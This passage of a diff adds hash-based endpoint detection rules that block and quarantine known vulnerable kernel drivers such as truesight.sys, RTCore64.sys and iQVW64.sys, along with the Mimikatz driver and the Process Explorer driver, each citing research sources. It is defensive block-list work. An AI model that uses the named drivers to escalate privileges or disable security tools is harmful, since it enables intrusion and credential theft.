+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "949bdc61-5746-5181-a0b8-309c8d04c0af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814807Z",
+ "creation_date": "2026-03-23T11:45:31.814811Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814821Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c0f29e618de3279c8e8acfa40e5401c07babd6745b424c70924e4af4c70a5fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "94b5c781-0054-51f6-aca2-7c976bf1e3e6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152262Z",
+ "creation_date": "2026-03-23T11:45:31.152265Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152273Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e9f972b519c685988bc5a7f6c4ccb22b9a772e9656bb993b6352106debe4b61",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "94b86396-5cdb-5c00-9dfa-a058b466d8b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607979Z",
+ "creation_date": "2026-03-23T11:45:29.607981Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607986Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "478c36f8af7844a80e24c1822507beef6314519185717ec7ae224a0e04b2f330",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "94bd268d-12b7-52ee-8b35-7774be423938",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828311Z",
+ "creation_date": "2026-03-23T11:45:30.828313Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba02e43430d579145900f42374fc56bf273024ecfbd44ce5532eda11ac0ba508",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "94be0003-257a-5907-bd65-33d21497d65b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818364Z",
+ "creation_date": "2026-03-23T11:45:30.818366Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818371Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "680ddece32fe99f056e770cb08641f5b585550798dfdf723441a11364637c7e6",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "94d5ac28-9db0-500f-8686-954e961d829b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819585Z",
+ "creation_date": "2026-03-23T11:45:30.819587Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819592Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4e500a9ac5991da5bf114fa80e66456a2cde3458a3d41c14e127ac09240c114",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "94d60cc0-9cfb-5cc0-9652-0ba2c2dc7860",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970315Z",
+ "creation_date": "2026-03-23T11:45:29.970317Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f9b01406864ab081aa77eef4ad15cb2dd2f830d1ef54f52622a59ff1aeb05ba5",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "94e2e2ef-8d3e-5f8b-b372-6e6410980cdf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832567Z",
+ "creation_date": "2026-03-23T11:45:30.832570Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832575Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3832cb8733556dd51ecfe0249453dbb1c2e68a4fadd2ccdda42095e6d34e143",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "94ec62c4-a471-5be9-ad86-3a60a50fa768",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605469Z",
+ "creation_date": "2026-03-23T11:45:29.605471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605476Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "94f48674-5043-5968-8419-00d4647b4c97",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972055Z",
+ "creation_date": "2026-03-23T11:45:29.972057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972062Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a59c40e7470b7003e8adfee37c77606663e78d7e3f2ebb8d60910af19924d8df",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "94f72601-f212-5b22-860a-2e09abaabcc3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812580Z",
+ "creation_date": "2026-03-23T11:45:31.812582Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812587Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3937547494dc6b46f7b584635a8e15d1a63101b4d90a7d11bef54b0d70537e1c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9516741f-12fa-5711-8b5d-cb434fca36c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819360Z",
+ "creation_date": "2026-03-23T11:45:30.819362Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819367Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e38c1b19e1bef9be8e9d8aa0d599086acb33867988e4077e0e7f35cc2bb30738",
+ "comment": "Vulnerable Kernel Driver (aka hwdetectng.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "952631bf-32cd-5c56-9634-6538d0db7e4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824349Z",
+ "creation_date": "2026-03-23T11:45:30.824351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ca247c3ca4ba56ca1e2c8a5972d5a147de33b335f0b8dcebc8657cd1c4b5f83",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "952d56b7-e4e1-58ed-b37c-56e68c2bf0fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836754Z",
+ "creation_date": "2026-03-23T11:45:30.836756Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836761Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6cf4d8c1ec738738fa6c7cd130c9658eb21faaef0a9f8659bde2efaad88d02b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "952fe222-ddf0-567a-8417-60f175f39a77",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149144Z",
+ "creation_date": "2026-03-23T11:45:31.149146Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149191Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "744ed029e9736a98f8e21b8e5d45e78a1cdeeeeb54701c4777099194de8eb6ab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "953521ba-e961-5900-9202-58a0d930f06c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823944Z",
+ "creation_date": "2026-03-23T11:45:31.823956Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823965Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "158c24d677ba46f36ee7af78321cc18070518d31d39cba466f121df3025c3ec5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9535de87-b09d-5208-90ee-a4dde33c391c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153230Z",
+ "creation_date": "2026-03-23T11:45:31.153233Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153242Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c96a79153fb6a5cbcea22594e0305c1290f98d22a6205f9c5aaafd86ae3d027a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "953aea04-e443-50f6-a66d-f2ab2cf42983",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480759Z",
+ "creation_date": "2026-03-23T11:45:31.480763Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44ec870309da8e35fc9c6cf3b82029ea780a15a6c24a95bbf498f76a1e45f0d9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9550324a-f828-5ca5-9ee7-2ad6504c354e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816809Z",
+ "creation_date": "2026-03-23T11:45:31.816812Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816819Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e599011e68fe87619f887731f8cefff3e7f2379fdb3432b1c0806a7b2908b2a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "95562fd9-1249-5a3b-8500-20568d458428",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829673Z",
+ "creation_date": "2026-03-23T11:45:30.829676Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829685Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f7b50d590b81850bb0a84fa1314cfd8572abf90fa9b4de8b89e1e9f906df35c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "958d9671-e989-5469-93d7-355e5034fdee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494546Z",
+ "creation_date": "2026-03-23T11:45:31.494548Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fdbc03908ce11512ba109d53e8d62b27e347683ff6aaad37d48b4eda3d2dddbc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9597b55e-da1f-5527-b410-5788e431c313",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491170Z",
+ "creation_date": "2026-03-23T11:45:31.491173Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491181Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c91902a47dd1324d534da43f97802017525c0569ff43e505d98501fbee10a6ae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "95bac36c-b45d-5b7c-9f58-023d05e26ee5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
